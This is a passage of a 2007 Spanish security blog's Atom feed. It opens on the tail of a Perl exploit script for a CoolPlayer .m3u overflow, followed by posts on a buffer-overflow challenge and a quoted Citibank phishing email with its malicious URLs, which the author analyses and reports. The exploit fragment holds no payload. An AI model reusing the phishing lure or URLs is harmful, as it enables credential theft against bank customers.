exploit\n";&lt;br /&gt;print "Depende del directorio actual del archivo .m3u y da problemas en el directorio\n";&lt;br /&gt;print "raiz C:\, F:\, etc...(Son 3 'A' mas)\n\n";&lt;br /&gt;&lt;br /&gt;print "Archivo creado\n";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Link: &lt;a href="http://www.p1mp4m.es/index.php?showtopic=58"&gt;http://www.p1mp4m.es/index.php?showtopic=58&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-6519865457833850012?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/6519865457833850012/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=6519865457833850012' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6519865457833850012'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6519865457833850012'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/12/exploit-para-coolplayer-217-m3u.html' title='Exploit para CoolPlayer 2.17, .m3u'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-3854968611188693603</id><published>2007-12-11T23:47:00.000+01:00</published><updated>2007-12-11T23:50:38.088+01:00</updated><title type='text'>Detecta quién te bloqueó o admite en tu cuenta MSN Messenger - Detector de Estado</title><content type='html'>Ya que no hablo casi ahora en el blog por poco tiempo, aprovecho para poner un post del blog de paisterist, para hacerle un poco de publicidad jeje, espero que os guste ;)&lt;br /&gt;&lt;br /&gt;Paisterist me debes una :P&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------&lt;br /&gt;Buenas, hago este post para comentarles mejor de un sitio de mío,&lt;a href="http://www.desadmite.com/"&gt; Desadmite.com&lt;/a&gt;, donde pueden chequear quién te eliminó de su cuenta MSN Messenger. Así, es un detector de estado que deduce quién te bloqueó en el msn analizando tus listas de contactos de la cuenta de MSN Messenger (Passport). Esta web no envía mensajes de MSN a los usuarios de tu lista, sino que, en caso de que lo desees, envía un e-mail como forma de recomendación del sitio. Toma algo así como 10 segundos y tus datos no son almacenados (¿para qué los quiero?).&lt;br /&gt;&lt;br /&gt;En fin, con la tranquilidad de que tu cuenta no corre peligro, puedes saber quién te bloqueó, quién te tiene sin admisión o eliminado en su MSN.&lt;br /&gt;&lt;br /&gt;Desadmite.com - Descubre quién te bloqueó (o eliminó) de su cuenta MSN Messenger&lt;br /&gt;&lt;br /&gt;Saludos&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-3854968611188693603?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/3854968611188693603/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=3854968611188693603' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3854968611188693603'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3854968611188693603'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/12/detecta-quin-te-bloque-o-admite-en-tu.html' title='Detecta quién te bloqueó o admite en tu cuenta MSN Messenger - Detector de Estado'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-4812979984818927440</id><published>2007-12-01T16:53:00.000+01:00</published><updated>2007-12-01T17:59:31.587+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fuzzing'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Retos'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><title type='text'>Yashira On y Mi reto para el que se atreva</title><content type='html'>Bueno ahora andan en un VPS configurado todo tal y como quieren, para que sea seguro y resista duros ataques de botnets normalitas. Principalmente, es posible gracias a &lt;a href="http://g30rg3x.com/"&gt;g30rg3_x&lt;/a&gt; y a los que colaboraron dando dinero también: &lt;a href="http://www.p1mp4m.es/"&gt;skyline2412&lt;/a&gt;, &lt;a href="http://www.p1mp4m.es/"&gt;patoruzu&lt;/a&gt; y Mcrow. Falta mi colaboración que llegará en cuanto me llegue la tarjeta nueva que con la que tenía no me vale.&lt;br /&gt;Así que en &lt;a href="http://www.yashira.org/"&gt;Yashira.org&lt;/a&gt; ya pusieron la nueva versión con todos sus retos, entre ellos el mio. Os dejo la descripción del mismo y acuérdense es un reto, que no es real del todo y es así porque la cuestión es aprender y asi no tardar demasiado en encontrar la vulnerabilidad.&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;Nombre del reto&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;Mision para Lara Croft&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;Indicaciones para que funcione bien&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;1º-Ruta Obligada --&gt; C:\RetoOverflow\reto.exe &amp;amp; C:\RetoOverflow\md5.dll&lt;br /&gt;&lt;br /&gt;2º-Hacer el reto con permisos de Administrador para evitar cualquier problema, porque puede que no funcione de no hacerlo así, ya cuando descubran el bug sabrán el porqué, o sino después de que lo encontréis os lo digo yo. (Si sabéis que bug es y aún así no os funciona me decís más que nada porque podria dar algun pequeño problema...pero solo cuando ya sepáis cual es la vulnerabilidad).&lt;br /&gt;&lt;br /&gt;3º-Este reto no consiste en buscar en el código del reto con un debugger, de momento, el posible error y por ello está empacado con el themida porque no quiero que miréis el código y lo saquéis así porque sí, hay otros modos de descubrir un bug ademas de ver el código y por ahí va parte del reto.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;Como pasar el reto&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;1º-De momento ,solo será necesario que encuentren el bug, y me envien la prueba de que funciona con argumentos AAAA dando el problema en la dirección 41414141, vamos lo de siempre, un access violation ahí.&lt;br /&gt;&lt;br /&gt;2º-Guiaros por la lógica y pensar...seguro lo sacáis pronto.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;Futuro&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Más adelante espero que esté la version 2 del reto y será algo más complicada porque habrá que ejecutar la calculadora por ejemplo...y como podréis ver más adelante hay trucos, maldito win y las vuln que hay sobre él...ejejej&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Para mas información mirar la Ayuda del programa.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;Premio&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;El que lo descubra sin trampas de chivatazos y se lo haya currado le paso el código del reto y ya veré si algo más.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos y Suerte&lt;br /&gt;&lt;br /&gt;Link: &lt;a href="http://www.yashira.org/index.php?mode=Retos&amp;amp;resp=inforeto&amp;amp;level=172"&gt;Reto 172&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-4812979984818927440?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/4812979984818927440/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=4812979984818927440' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4812979984818927440'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4812979984818927440'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/12/yashira-on-y-mi-reto-para-el-que-se.html' title='Yashira On y Mi reto para el que se atreva'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-2863157887758912116</id><published>2007-11-21T22:20:00.000+01:00</published><updated>2007-11-21T23:48:04.395+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Varios'/><category scheme='http://www.blogger.com/atom/ns#' term='Phising'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>¿Phising o tontería?</title><content type='html'>Hoy entro en mi correo y veo un mensaje como lo que me envían últimamente de scam, no se puede registrar la web en ciertos directorios....y bueno los ando guardando todos, para ver al final de año cual ha sido el más original y más creible. Pero resulta que el de hoy no trataba de ello, era un típico correo para quitarte tu cuenta. Yo creo que es la primera vez que me llega uno de un banco, soy feliz jejej pensaba que nunca me llegaría nada así después de tanto tiempo, ahora solo falta que lleguen los virus potentes para asi mirarlos un poquito como son o exploits en archivos.&lt;br /&gt;Ahi va:&lt;br /&gt;------------------------------------------------------------------------&lt;br /&gt;Dear Sir/Madam,&lt;br /&gt;&lt;br /&gt;Citibank always looks forward for the high security of  our&lt;br /&gt;clients. Some customers have been receiving an email claiming to  be&lt;br /&gt;from Citibank advising them to follow a link to what appear&lt;br /&gt;to be a  Citibank web site, where they are prompted to enter&lt;br /&gt;their personal Online  Banking details. Citibank is in no&lt;br /&gt;way involved with this email and the web  site does not belong to us.&lt;br /&gt;&lt;br /&gt;Citibank is proud to announce about their new  updated secure system.&lt;br /&gt;We updated our new SSL servers to give our customers a  better, fast&lt;br /&gt;and secure online banking service.&lt;br /&gt;&lt;br /&gt;Due to the recent  update of the servers, you are requested to please&lt;br /&gt;update your account info  at the following link.&lt;br /&gt;&lt;br /&gt;&lt;a onclick="onClickUnsafeLink(event);" href="http://www.dewithmaaltijden.nl/include/www.citibank.com/Citi/CitiBank/citibank/index.html" target="_blank"&gt;https://web.da-us.citibank.com/cgi-bin/citifi/portal/l/l.do&lt;/a&gt;&lt;br /&gt;&lt;table border="0" cellpadding="0" cellspacing="0" width="778"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td colspan="3"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td colspan="3" bgcolor="#cccccc" height="1"&gt;&lt;img onclick="onClickUnsafeLink(event);" src="http://gfx1.hotmail.com/mail/w2/ltr/i_safe.gif" height="1" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td width="5"&gt;&lt;br /&gt;&lt;/td&gt; &lt;td class="EC_footerText" align="left" valign="bottom"&gt;&lt;b&gt;&lt;span style="font-size:85%;"&gt;This web site  is operated by Citibank, N.A., Member FDIC&lt;/span&gt;&lt;/b&gt;&lt;/td&gt; &lt;td align="right"&gt;&lt;b&gt;&lt;a class="EC_footerLink" onclick="onClickUnsafeLink(event);" href="http://www.citibank.com/domain/spoof/sitesecurity.htm" target="_blank"&gt;&lt;span style="font-size:85%;"&gt;Security&lt;/span&gt;&lt;/a&gt;&lt;span style="font-size:85%;"&gt; &lt;span class="EC_bodyText"&gt;| &lt;/span&gt;&lt;a class="EC_footerLink" onclick="onClickUnsafeLink(event);" href="https://web.da-us.citibank.com/cgi-bin/citifi/scripts/help_desk/site_map.jsp?BV_UseBVCookie=yes" target="_blank"&gt;Site map&lt;/a&gt; &lt;span class="EC_bodyText"&gt;| &lt;/span&gt;&lt;a class="EC_footerLink" onclick="onClickUnsafeLink(event);" href="http://careers.citigroup.com/careers/homepage/homepage.aspx" target="_blank"&gt;Careers&lt;/a&gt; &lt;span class="EC_bodyText"&gt;| &lt;/span&gt;&lt;a class="EC_footerLink" onclick="onClickUnsafeLink(event);" href="http://www.citigroup.com/citigroup/privacy/index.htm" target="_blank"&gt;privacy&lt;/a&gt;&lt;span class="EC_bodyText"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td width="5"&gt;&lt;br /&gt;&lt;/td&gt; &lt;td class="EC_footerText" colspan="2"&gt;&lt;b&gt;&lt;span style="font-size:85%;"&gt;Copyright © 2007 Citigroup  Inc.&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;----------------------------------------------&lt;br /&gt;&lt;br /&gt;Bonito link ese último..el que en realidad es: http://www.dewithmaaltijden.nl/include/www.citibank.com/Citi/CitiBank/citibank/index.html&lt;br /&gt;&lt;br /&gt;Eso si que es sospechoso, por lo que me fijé envia todo a un archivo .php llamado yassino.php , y estuve buscando en google y aparecieron 2 entradas distintas de foros que daban estas webs:&lt;br /&gt;&lt;br /&gt;http://www.autolek.com/images/stories/www.bankofameria.com/Online_BofA_Banking/repution/updating.cfmpage=corp_bofacom/yassino.php&lt;br /&gt;http://yourallergysymptoms.com/onlinebnkig-nw-bankofamerica-com/yassino.php&lt;br /&gt;&lt;br /&gt;Es muy probable que sea del mismo autor, al menos la primera porque es del mismo estilo, la cosa que no puedo comprobarlas porque andan off. Ala tengan cuidado que esta forma es de las más sencillitas que te encuentras.&lt;br /&gt;&lt;br /&gt;PD: Lo envie a &lt;a href="http://www.phishtank.com/"&gt;Phistank&lt;/a&gt; una web que me encontré para publicar phising, parece importante debido a su número elevado de webs con phising enviados.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-2863157887758912116?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/2863157887758912116/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=2863157887758912116' title='4 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/2863157887758912116'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/2863157887758912116'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/11/phising-o-tontera.html' title='¿Phising o tontería?'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-881278962364232967</id><published>2007-11-18T17:36:00.031+01:00</published><updated>2009-08-19T12:47:35.415+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fuzzing'/><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas WEB'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><category scheme='http://www.blogger.com/atom/ns#' term='Auditoria'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Distintos Blogs y paginas buenas</title><content type='html'>Para que no ocupe mucho los links que suelo ver a diario y que me parecen buenos, o algunos que veo de vez en cuando, voy a poner una lista aqui que ire reyenando.&lt;br /&gt;&lt;br /&gt;En Español:&lt;br /&gt;&lt;a href="http://groups.google.com.mx/group/CrackSLatinoS"&gt;Lista de CracksLatinos&lt;/a&gt;&lt;br /&gt;&lt;a href="http://elladodelmal.blogspot.com/"&gt;El Lado Del Mal - Chema &lt;/a&gt;&lt;br /&gt;&lt;a href="http://blog.s21sec.com/"&gt;Blog S21Sec&lt;/a&gt;&lt;br /&gt;&lt;a href="http://boken00.blogspot.com/"&gt;Blog de Boken&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.48bits.com/"&gt;48bits&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.securitybydefault.com/"&gt;SecurityByDefault&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.kriptopolis.org/"&gt;Kriptopolis&lt;/a&gt;&lt;br /&gt;&lt;a href="http://zhodiac.net-dreamer.net/index.php?section=blog"&gt;Blog de Zhodiac&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.vallejo.cc/"&gt;JV Vallejo&lt;/a&gt;&lt;br /&gt;&lt;a href="http://blog.hispasec.com/laboratorio/"&gt;Laboratorio de Hispasec&lt;/a&gt;&lt;br /&gt;&lt;a href="http://foro.elhacker.net/bugs_y_exploits-b32.0/"&gt;Foro de bugs - elhacker.net&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.wadalbertia.org/"&gt;Wadalbertia&lt;/a&gt;&lt;br /&gt;&lt;a href="http://h4ck1t.blogspot.com/"&gt;h4ck1t - h1t&lt;/a&gt;&lt;br /&gt;&lt;a href="http://spanish-hackers.com/blog/"&gt;Blog de JosS&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.sinfocol.org/"&gt;Blog de HaDeS&lt;/a&gt;&lt;br /&gt;&lt;a href="http://el-blog-de-thor.blogspot.com/"&gt;Blog de Thor&lt;/a&gt;&lt;br /&gt;&lt;a href="http://crackinglandia.blogspot.com/"&gt;Blog de +NCR/CRC!&lt;/a&gt;&lt;br /&gt;&lt;a href="http://explotandotodo.blogspot.com/"&gt;Blog de Yibam&lt;/a&gt;&lt;br /&gt;&lt;a href="http://amerikanocls.blogspot.com/"&gt;Blog de AmeRiK@nO&lt;/a&gt;&lt;br /&gt;&lt;a href="http://hackit.txipinet.com/"&gt;Todo sobre Hack It - Euskal&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;En Ingles:&lt;br /&gt;&lt;a href="http://technet.microsoft.com/en-us/sysinternals/default.aspx"&gt;SysInternals - Mark Russinovich&lt;/a&gt;&lt;br /&gt;&lt;span class="blogUrl"&gt;&lt;/span&gt;&lt;a dir="ltr" href="http://browserfun.blogspot.com/"&gt;BrowserFun - Cerrado :(&lt;/a&gt;&lt;br /&gt;&lt;a href="http://kernelfun.blogspot.com/"&gt;KernelFun&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.openrce.org/articles/"&gt;OpenRCE&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.phreedom.org/research/"&gt;Alexander Sotirov&lt;/a&gt;&lt;br /&gt;&lt;a href="http://skypher.com/wiki/index.php?title=ALPHA3"&gt;Alpha3 Shellcoder - Skylined&lt;/a&gt;&lt;br /&gt;&lt;a href="http://aluigi.altervista.org/index.htm"&gt;Luigi Auriemma&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.milw0rm.org/"&gt;Milw0rm&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.0x000000.com/index.php"&gt;rvdh - 0x000000 - Browser Attacks&lt;/a&gt;&lt;br /&gt;&lt;a href="http://addxorrol.blogspot.com/"&gt;Halvar Flake&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.openrce.org/"&gt;Pedram Amini - OpenRCE&lt;/a&gt;&lt;br /&gt;&lt;a href="http://jeremiahgrossman.blogspot.com/"&gt;Jeremiah Grossman - Web Hacking&lt;/a&gt;&lt;br /&gt;&lt;a href="http://blog.dkbza.org/"&gt;Ero Carrera&lt;/a&gt;&lt;br /&gt;&lt;a href="http://ha.ckers.org/"&gt;RSnake - ha.ckers&lt;/a&gt;&lt;br /&gt;&lt;a href="http://blogs.securiteam.com/"&gt;SecurityTeam&lt;/a&gt;&lt;br /&gt;&lt;a href="http://pferrie.tripod.com/"&gt;Peter Ferrie&lt;/a&gt;&lt;br /&gt;&lt;a href="http://cansecwest.com/pastevents.html"&gt;Archivos de las conferencias CanSecWest&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.blackhat.com/html/bh-media-archives/bh-multimedia-archives-index.html"&gt;Archivos de las conferencias BlackHat&lt;/a&gt;&lt;br /&gt;&lt;a href="http://doc.bughunter.net/"&gt;Archivos de BugHunter sobre todo&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Ireagregando segun me vaya acordando&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-881278962364232967?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/881278962364232967/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=881278962364232967' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/881278962364232967'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/881278962364232967'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/11/distintos-blogs-y-paginas-buenas.html' title='Distintos Blogs y paginas buenas'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-1924919755455037574</id><published>2007-11-17T18:21:00.000+01:00</published><updated>2007-11-18T22:24:55.826+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ezine Yashira'/><category scheme='http://www.blogger.com/atom/ns#' term='Varios'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><title type='text'>Organizando la 1º Ezine Yashira</title><content type='html'>Hoy es día de revisar la creación de la ezine, ya que me enviaron un artículo largo pero bastante interesante y además tengo que maquetar otro que tenía por ahí, todavía estoy abierto a más artículos que me quieran enviar y hablaré con los admins de &lt;a href="http://www.yashira.org/"&gt;Yashira.org&lt;/a&gt; para ver si a los que escriban un artículo que se publique en la ezine se les da una cuenta @yashira.org, de momento cuento con 3 maquetados completamente, 1 hecho casi al completo pero que le faltan imágenes y 2 que me tienen que enviar. La cosa sería llegar a los 10 artículos y publicarlos antes de fin de año o al comienzo de éste, pero no se si dará tiempo. Os aseguro que os gustaran para algo está tardando. Recuerdo el link que dejé en yashira:&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------------&lt;br /&gt;Bueno, pues despues de ver todos los votos y la mayoria a favor del si, solo queda abrir la ezine y ponerse al desarrollo de ella.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;Para empezar:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;1º-Temas a tratar:&lt;/span&gt; Pues relacionados con la informática, hacking, ing inversa, criptografía, programación que se puede incluir en alguna de las anteriores, y algunas curiosidades que haya , o artículos especiales, todo dependerá de la información que haya.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2º-Cómo escribirlos: &lt;/span&gt;Bueno pues escribirlos como queráis y en el formato que queráis, eso si nada rarito...xD, luego los pasaré a pdf para que se vea mejor y tal, y se pueden incluir imágenes pero no lo carguen demasiado, teoríaa y práctica estaría bien en todos los artículos que se pueda.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3º-Artículos:&lt;/span&gt; No tengo por que publicar todo lo que enviéis, cualquier fallo en el artículo se intentará mirar con todo el staff que lo revise y además se pedirá un nivel medio-alto para la ezine, para hacerla una de las mejores que se pueda, aunque se tarde en publicarla.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;4º-Colaboraciones:&lt;/span&gt; Enviármelas a mi agregándome al msn trancek@gmail.com(el correo no me funciona...),enviando un correo a trancek@yashira.org o enviarme un MP por yashira posteándome un link para coger la info, me meto a diario así que lo veré ok?&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;5º-Ortografía:&lt;/span&gt; Esto intentar ponerlo con las menores faltas posibles y tal, y bueno para explicar algo no utilicen palabras del país propio para que así todos puedan entender bien el artículo.&lt;br /&gt;&lt;br /&gt;Saludos y esperemos que este proyecto vaya hacia delante!!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-1924919755455037574?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/1924919755455037574/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=1924919755455037574' title='6 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/1924919755455037574'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/1924919755455037574'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/11/organizando-la-1-ezine-yashira.html' title='Organizando la 1º Ezine Yashira'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-5627456220059537338</id><published>2007-11-10T00:49:00.000+01:00</published><updated>2007-11-10T01:13:53.088+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Varios'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Arrestado por espionaje "SyS64738"</title><content type='html'>Uno de los importantes en la red, Roberto Preatoni(Alias-SyS64738),en el campo de vulnerabilidades y auditorías ha sido detenido por espionaje a Telecom Italia, es famoso por ser el fundador de dos páginas muy famosas en el ámbito del defacing y la auditoría de software, las páginas en cuestión son &lt;span style="font-weight:bold;"&gt;&lt;a href="http://www.wslabi.com/wabisabilabi/home.do?"&gt;WabiSabiLabi&lt;/a&gt;&lt;/span&gt; de la que hablé y que se dedicaba a la venta de vulnerabilidades con sus correspondientes exploits, y además la web para registrar defaces &lt;span style="font-weight:bold;"&gt;&lt;a href="http://www.zone-h.org"&gt;Zone-h&lt;/a&gt;&lt;/span&gt;. Imparte conferencias en todo el mundo y  es el que lleva Hero-Z comics. Respecto al arresto la razón de la detención fue unos ataques junto a otros que no estaban autorizados a hacer los ataques y por realizar intervenciones telefónicas y por ello Telecom Italia les ha denunciado. Así que veremos que pasa y bueno hasta hoy no supe que era también el de &lt;span style="font-weight:bold;"&gt;&lt;a href="http://www.zone-h.org"&gt;Zone-h&lt;/a&gt;&lt;/span&gt; cosa que me defraudó por ser el creador de la web WabiSabiLabi.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-5627456220059537338?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/5627456220059537338/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=5627456220059537338' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5627456220059537338'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5627456220059537338'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/11/arrestado-por-espionaje-sys64738.html' title='Arrestado por espionaje &quot;SyS64738&quot;'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-3835334560015314750</id><published>2007-11-06T17:45:00.000+01:00</published><updated>2007-12-04T23:35:51.770+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ingenieria Inversa'/><category scheme='http://www.blogger.com/atom/ns#' term='Retos'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><title type='text'>2º Reto S21sec Labs</title><content type='html'>La empresa &lt;span style="font-weight:bold;"&gt;&lt;a href="http://www.s21sec.com/"&gt;S21sec&lt;/a&gt;&lt;/span&gt; anda poniendo de vez en cuando retos en su &lt;a href="http://blog.s21sec.com/"&gt;&lt;span style="font-weight:bold;"&gt;blog&lt;/span&gt;&lt;/a&gt; en el cual te ponen a prueba y por ahora los 2 retos han sido de Ingeniería Inversa, éste segundo además iba con premio, el libro &lt;span style="font-weight:bold;"&gt;The Shellcoder's Handbook: Discovering and Exploiting Security Holes &lt;/span&gt;(segunda edición). Un libro bastante bueno que estuve pensando en 